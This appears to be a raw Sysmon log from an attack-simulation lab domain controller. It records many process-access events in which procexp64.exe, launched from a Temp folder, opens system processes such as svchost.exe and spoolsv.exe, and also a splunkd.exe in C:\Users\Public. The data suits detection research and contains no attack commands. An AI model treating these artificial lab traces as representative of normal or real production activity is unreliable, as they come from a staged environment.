15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 